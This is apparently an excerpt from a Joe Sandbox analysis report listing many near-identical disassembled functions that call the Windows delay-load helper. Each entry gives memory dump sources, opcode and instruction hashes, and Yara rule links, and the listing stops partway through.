                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: cb9793b178b250a92b4bb33def026593b3928a4c72598865dbcca6161895caed
                                                                                                                    • Instruction ID: ac877f1892f778fdd2862baaebaa626b1b336ec32b35d6db014645264a1af8e8
                                                                                                                    • Opcode Fuzzy Hash: cb9793b178b250a92b4bb33def026593b3928a4c72598865dbcca6161895caed
                                                                                                                    • Instruction Fuzzy Hash: 7CB012E52DA100BC354861163C07C37014CD0C9F10330B03EFC56F0380D840BD000531
                                                                                                                    Function 00E4E5A7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E580
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Fjun
                                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                                    • Opcode ID: 98cb34341fdb3bc7fcf85808fcfa89fd11d7a7f39871a8e8a24ef0d28ea975a8
                                                                                                                    • Instruction ID: 58f96793fa710492e02795269d85ce02b30e7449d6af6fb22a1e09afedc7ea23
                                                                                                                    • Opcode Fuzzy Hash: 98cb34341fdb3bc7fcf85808fcfa89fd11d7a7f39871a8e8a24ef0d28ea975a8
                                                                                                                    • Instruction Fuzzy Hash: DBB012C129A1007C35086265BD03C3F015CE0C4F20334732EF406F1280EC400D010539
                                                                                                                    Function 00E4E5B1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E580
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Fjun
                                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                                    • Opcode ID: 9d7ab2cd262432f5d9bdc29b4994ac6aecff327729d8c628115831ba20b10192
                                                                                                                    • Instruction ID: cac64f9d0c6216d5c428c4114a7a2c45daaaa13c702084cc907d443191fab517
                                                                                                                    • Opcode Fuzzy Hash: 9d7ab2cd262432f5d9bdc29b4994ac6aecff327729d8c628115831ba20b10192
                                                                                                                    • Instruction Fuzzy Hash: 2BB012C129A2007C35486265BC03C3B015CE0C4F20334732FF406F1280E8400C400535
                                                                                                                    Function 00E4E593 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E580
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: Fjun
                                                                                                                    • API String ID: 1269201914-1717936292
                                                                                                                    • Opcode ID: a0639621bcab85381877fca91d94e06025cc0b606b71321ac26990c6afa63bc4
                                                                                                                    • Instruction ID: 20ad95279d365ad10fb337e7831367e5d1a66fa84db50d8b1ecd58c5524c21db
                                                                                                                    • Opcode Fuzzy Hash: a0639621bcab85381877fca91d94e06025cc0b606b71321ac26990c6afa63bc4
                                                                                                                    • Instruction Fuzzy Hash: 4CB012C129A1007D350862657C03C7B014CF0C4F20330712EF405F1690E8400C000535
                                                                                                                    Function 00E4E546 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<
                                                                                                                    • API String ID: 1269201914-576538559
                                                                                                                    • Opcode ID: 158f9d68ac1324b3db47ab144cf80e988c3bb339667b1d6274db97e4659d6702
                                                                                                                    • Instruction ID: 622bc162dd5b517d65702b44eaf5cb1a1d33fcb947195469972cf25e465b0e0c
                                                                                                                    • Opcode Fuzzy Hash: 158f9d68ac1324b3db47ab144cf80e988c3bb339667b1d6274db97e4659d6702
                                                                                                                    • Instruction Fuzzy Hash: 0AB012C16982007C3A086119BC03C3F014DD4C5F10330722EF406F0280E8401C440536
                                                                                                                    Function 00E4E50D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: PDu<
                                                                                                                    • API String ID: 1269201914-576538559
                                                                                                                    • Opcode ID: 9a882ffd314e9b59fe5e3c92628b12db03783b2a6179970ecc9a5951b788c434
                                                                                                                    • Instruction ID: 33818cef75e3ce9e23a8b3353abeee79cd7cbf85b543649bf9d4813a50de9844
                                                                                                                    • Opcode Fuzzy Hash: 9a882ffd314e9b59fe5e3c92628b12db03783b2a6179970ecc9a5951b788c434
                                                                                                                    • Instruction Fuzzy Hash: 4CB012C16981007C390821357C07C3F010EE4C1F10330703EF451F0581A8401D040432
                                                                                                                    Function 00E4E2C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 633728d969721cf3f8346a44815ddc10f8c3fff5e01f0d856d8842df69080d1b
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: 633728d969721cf3f8346a44815ddc10f8c3fff5e01f0d856d8842df69080d1b
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    Function 00E4E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 4b582fcaced4b62e7885ae2eaeb6c79e236cb08a4249b671294a710b65966d26
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: 4b582fcaced4b62e7885ae2eaeb6c79e236cb08a4249b671294a710b65966d26
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    Function 00E4E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 0cbc345199f970fb595ee3a8e2fde8615b5d9d86f3cc2fefe7c9247ca20d94ae
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: 0cbc345199f970fb595ee3a8e2fde8615b5d9d86f3cc2fefe7c9247ca20d94ae
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    Function 00E4E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 0a8ede8c57d9705a73547bbf166d795fc03dd307e84144c0aa4cfa229ee8b5d8
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: 0a8ede8c57d9705a73547bbf166d795fc03dd307e84144c0aa4cfa229ee8b5d8
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    Function 00E4E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: e17706c963f4320e01e56a0b706851ff2819f5dced3f89ec89f36700eaf445ce
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: e17706c963f4320e01e56a0b706851ff2819f5dced3f89ec89f36700eaf445ce
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    Function 00E4E2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: ed26336c00438ff856d802e97b657628a5c8401a7e1fe48577a3bc69914d18aa
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: ed26336c00438ff856d802e97b657628a5c8401a7e1fe48577a3bc69914d18aa
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    Function 00E4E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 6691b629cb521baf2fb49f60ad3cc41638fad42033bcb979cb397de27139cdd9
                                                                                                                    • Instruction ID: 9b9dfc22f0eb3f66c79b18039dccbcb23e8591b654f54fb9e206c05606d6d392
                                                                                                                    • Opcode Fuzzy Hash: 6691b629cb521baf2fb49f60ad3cc41638fad42033bcb979cb397de27139cdd9
                                                                                                                    • Instruction Fuzzy Hash: 2EA001E62EA242BC354862527D06C7B065DE4C9BA1334A92EF8A7E4681A99078451971
                                                                                                                    Function 00E4E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
